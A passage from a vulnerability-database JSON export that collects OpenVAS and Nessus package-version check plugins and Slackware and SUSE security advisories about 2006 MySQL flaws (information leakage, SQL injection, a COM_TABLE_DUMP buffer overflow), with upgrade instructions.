"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-2753", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231056861", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231056861", "type": "openvas", "title": "Slackware Advisory SSA:2006-155-01 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_155_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.56861\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-2753\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-155-01 mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-155-01\");\n script_xref(name:\"URL\", value:\"http://lists.mysql.com/announce/364\");\n script_xref(name:\"URL\", value:\"http://lists.mysql.com/announce/365\");\n\n script_tag(name:\"insight\", value:\"New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. 
Slackware does not provide\nnetwork access to a MySQL database by default.\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.20-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-2753", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:56861", "href": "http://plugins.openvas.org/nasl.php?oid=56861", "type": "openvas", "title": "Slackware Advisory SSA:2006-155-01 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_155_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# 
Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. 
Slackware does not provide\nnetwork access to a MySQL database by default.\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\n\nFor more details, see the MySQL 4.1.20 release announcement here:\nhttp://lists.mysql.com/announce/364\nAnd the MySQL 5.0.22 release announcement here:\nhttp://lists.mysql.com/announce/365\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-155-01\";\n \nif(description)\n{\n script_id(56861);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-2753\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-155-01 mysql \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.20-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1518"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56714", "href": "http://plugins.openvas.org/nasl.php?oid=56714", "type": "openvas", "title": "FreeBSD Ports: mysql-server", "sourceData": "#\n#VID a8d8713e-dc83-11da-a22b-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: mysql-server\n\nCVE-2006-1518\nBuffer overflow in the open_table function in sql_base.cc in MySQL\n5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary\ncode via crafted COM_TABLE_DUMP packets with invalid length values.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.wisec.it/vulns.php?page=8\nhttp://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=114659633220473\nhttp://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56714);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: mysql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mysql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0\")>0 && revcomp(a:bver, b:\"5.0.21\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1516", "CVE-2006-1517", "CVE-2006-1518"], "description": "New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. 
Slackware does not provide\nnetwork access to a MySQL database by default.\n\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database.\nIssues that affect both Slackware 10.2 and -current:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n\nAn issue affecting only Slackware -current:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1518\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/mysql-4.1.19-i486-1.tgz:\n Upgraded to mysql-4.1.19.\n This fixes some minor security issues with possible information leakage.\n Note that the information leakage bugs require that the attacker have\n access to an account on the database. Also note that by default,\n Slackware's rc.mysqld script does *not* allow access to the database\n through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter\n the port (3306) to prevent access from unauthorized machines.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n (* Security fix *)\n\nHere are the details from the Slackware -current ChangeLog:\n\nap/mysql-5.0.21-i486-1.tgz: Upgraded to mysql-5.0.21.\n This fixes some security issues, including possible information leakage, and\n execution of arbitrary code. Note that the information leakage bugs require\n that the attacker have access to an account on the database. 
Also note that\n by default, Slackware's rc.mysqld script does *not* allow access to the\n database through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter the\n port (3306) to prevent access from unauthorized machines.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1518\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mysql-4.1.19-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mysql-5.0.21-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\nc229e19d782404da119be46355a170d2 mysql-4.1.19-i486-1.tgz\n\nSlackware -current package:\n51008b23954c0d82c2670290476d0249 mysql-5.0.21-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mysql-4.1.19-i486-1.tgz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2006-05-09T22:19:51", "published": "2006-05-09T22:19:51", "id": "SSA-2006-129-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.507293", "type": "slackware", "title": "[slackware-security] mysql", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1516", "CVE-2006-1517", "CVE-2006-2753"], "description": "New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. 
This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database.\nFixes that affect Slackware 9.1, 10.0, and 10.1:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\n\nFor more details, see the MySQL 4.1.20 release announcement here:\n http://lists.mysql.com/announce/364\nAnd the MySQL 5.0.22 release announcement here:\n http://lists.mysql.com/announce/365\nThe CVE entry for this issue can be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2753\n\n\nHere are the details from the Slackware 10.1 ChangeLog:\n\npatches/packages/mysql-4.0.27-i486-1_slack10.1.tgz:\n Upgraded to mysql-4.0.27.\n This fixes some minor security issues with possible information leakage.\n Note that the information leakage bugs require that the attacker have\n access to an account on the database. 
Also note that by default,\n Slackware's rc.mysqld script does *not* allow access to the database\n through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter\n the port (3306) to prevent access from unauthorized machines.\n For more details, see the MySQL 4.0.27 release announcement here:\n http://lists.mysql.com/announce/359\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n (* Security fix *)\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/mysql-4.1.20-i486-1_slack10.2.tgz:\n Upgraded to mysql-4.1.20. This fixes an SQL injection vulnerability.\n For more details, see the MySQL 4.1.20 release announcement here:\n http://lists.mysql.com/announce/364\n The CVE entry for this issue will be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2753\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mysql-4.0.27-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mysql-4.0.27-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/mysql-4.0.27-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mysql-4.1.20-i486-1_slack10.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mysql-5.0.22-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 package:\neea73f16715c07de52701b67f037e7ab mysql-4.0.27-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n6afab2cdd09adf4b4f822db6c74b167e mysql-4.0.27-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\ncbe2044d3b75606de6f3796d607e7c0a mysql-4.0.27-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n249bc3f4610cbedf8b0a6fc64c28c53f mysql-4.1.20-i486-1_slack10.2.tgz\n\nSlackware -current package:\naf1829c54b901bc01fcd269f27580b21 mysql-5.0.22-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mysql-4.1.20-i486-1_slack10.2.tgz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2006-06-05T08:12:48", "published": "2006-06-05T08:12:48", "id": "SSA-2006-155-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377", "type": "slackware", "title": "[slackware-security] mysql", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:56:23", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The database server 
MySQL was updated to fix the following security problems:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2006-06-23T08:26:58", "published": "2006-06-23T08:26:58", "id": "SUSE-SA:2006:036", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-06/msg00023.html", "title": "remote code execution in mysql", "type": "suse", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-17T14:46:45", "description": "Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517). Attackers could execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : mysql (mysql-1312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_MYSQL-1312.NASL", "href": "https://www.tenable.com/plugins/nessus/27356", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mysql-1312.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27356);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n\n script_name(english:\"openSUSE 10 Security Update : mysql (mysql-1312)\");\n script_summary(english:\"Check for the mysql-1312 patch\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517). Attackers could execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected mysql package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) 
audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"mysql-5.0.18-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:14:48", "description": "The remote host is missing the patch for the advisory SUSE-SA:2006:036 (mysql).\n\n\nThe database server MySQL was updated to fix the following security problems:\n\n- Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517).\n\n- Attackers could potentially execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\n\nThe mysql server package was released on May 30th already, the\nmysql-Max server package was released on June 20th after additional\nbugfixes.", "edition": 6, "published": "2007-02-18T00:00:00", "title": "SUSE-SA:2006:036: mysql", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-02-18T00:00:00", "cpe": [], "id": "SUSE_SA_2006_036.NASL", "href": "https://www.tenable.com/plugins/nessus/24416", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:036\n#\n\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(24416);\n script_version(\"1.10\");\n \n name[\"english\"] = \"SUSE-SA:2006:036: mysql\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2006:036 (mysql).\n\n\nThe database server MySQL was updated to fix the following security problems:\n\n- Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517).\n\n- Attackers could potentially execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\n\nThe mysql server package was released on May 30th already, the\nmysql-Max server package was released on June 20th after additional\nbugfixes.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.novell.com/linux/security/advisories/2006_36_mysql.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the mysql package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( 
